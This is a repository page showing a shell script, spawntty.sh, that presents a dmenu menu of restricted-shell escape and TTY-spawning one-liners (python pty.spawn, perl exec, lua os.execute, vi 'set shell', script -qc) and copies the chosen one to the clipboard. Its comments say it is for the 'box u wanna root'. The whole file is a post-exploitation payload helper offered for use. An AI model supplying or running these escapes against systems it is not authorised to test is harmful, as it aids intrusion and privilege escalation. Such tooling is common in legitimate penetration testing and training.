Home Explore Help
Register Sign In
m4t
/
scripts
Watch 1
Star 0
Fork 0
Files Issues 0 Pull Requests 0 Wiki
Branch: master
Branches Tags
scripts
/
spawntty.sh

spawntty.sh 2.2 KB
Permalink History Raw

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960 
  1. #!/bin/sh
    2. 

  2. 

  3. # -- Just a dmenu wrapper --
    4. 

  4. # Just some payloads that are
    5. 

  5. # helping u exit those restricted
    6. 

  6. # shellZ(spawn a tty) on the box u wanna root
    7. 

  7. # Created by M4t35Z
    8. 

  8. 

  9. # Inspired by: 
    10. 

  10. # https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
    11. 

  11. 

  12. # shell copypasta
    13. 

  13. ## sh
    14. 

  14. sh_shell="/bin/sh -i"
    15. 

  15. ## python
    16. 

  16. python1_shell="python3 -c 'import pty; pty.spawn("\""/bin/sh"\"")'"
    17. 

  17. python2_shell="python3 -c "\""__import__('pty').spawn('/bin/bash')"\"""
    18. 

  18. python3_shell="python3 -c "\""__import__('subprocess').call(['/bin/bash'])"\"""
    19. 

  19. ## perl
    20. 

  20. perl1_shell="perl -e 'exec "\""/bin/sh"\"";'"
    21. 

  21. perl2_shell="perl -e 'print \`/bin/bash\`'"
    22. 

  22. ## ruby
    23. 

  23. ruby1_shell="exec "\""/bin/sh"\"""
    24. 

  24. ## lua
    25. 

  25. lua1_shell="os.execute('/bin/sh')"
    26. 

  26. ## vi
    27. 

  27. vi1_shell="set shell=/bin/bash"
    28. 

  28. ## script
    29. 

  29. script1_shell="/usr/bin/script -qc /bin/bash /dev/null"
    30. 

  30. 

  31. # ---
    32. 

  32. 

  33. # texts
    34. 

  34. sh_text="sh -> $sh_shell"
    35. 

  35. python1_text="py1 (basic pty + sh) -> $python1_shell"
    36. 

  36. python2_text="py2 (__ escape + bash) -> $python2_shell"
    37. 

  37. python3_text="py3 (subprocess + bash) -> $python3_shell"
    38. 

  38. perl1_text="pl1 (sh) -> $perl1_shell"
    39. 

  39. perl2_text="pl2 (\` + bash) -> $perl2_shell"
    40. 

  40. ruby1_text="rb1 -> $ruby1_shell"
    41. 

  41. lua1_text="lua1 -> $lua1_shell"
    42. 

  42. vi1_text="vi (to command mode :D) -> $vi1_shell"
    43. 

  43. script1_text="script -> $script1_shell"
    44. 

  44. 

  45. # ---
    46. 

  46. 

  47. case "$(printf "$sh_text\\n$python1_text\\n$python2_text\\n$python3_text\\n$perl1_text\\n$perl2_text\\n$ruby1_text\\n$lua1_text\\n$vi1_text\\n$script1_text" | dmenu -l 10 -i -p "L1573n3rZ")" in
    48. 

  48. 

  49.     "$sh_text") echo -n "$sh_shell" | xclip -selection clipboard ;;
    50. 

  50.     "$python1_text") echo -n "$python1_shell" | xclip -selection clipboard ;;
    51. 

  51.     "$python2_text") echo -n "$python2_shell" | xclip -selection clipboard ;;
    52. 

  52.     "$python3_text") echo -n "$python3_shell" | xclip -selection clipboard ;;
    53. 

  53.     "$perl1_text") echo -n "$perl1_shell" | xclip -selection clipboard ;;
    54. 

  54.     "$perl2_text") echo -n "$perl2_shell" | xclip -selection clipboard ;;
    55. 

  55.     "$ruby1_text") echo -n "$ruby1_shell" | xclip -selection clipboard ;;
    56. 

  56.     "$lua1_text") echo -n "$lua1_shell" | xclip -selection clipboard ;;
    57. 

  57.     "$vi1_text") echo -n "$vi1_shell" | xclip -selection clipboard ;;
    58. 

  58.     "$script1_text") echo -n "$script1_shell" | xclip -selection clipboard ;;
    59. 

  59. esac
    60. 

  60.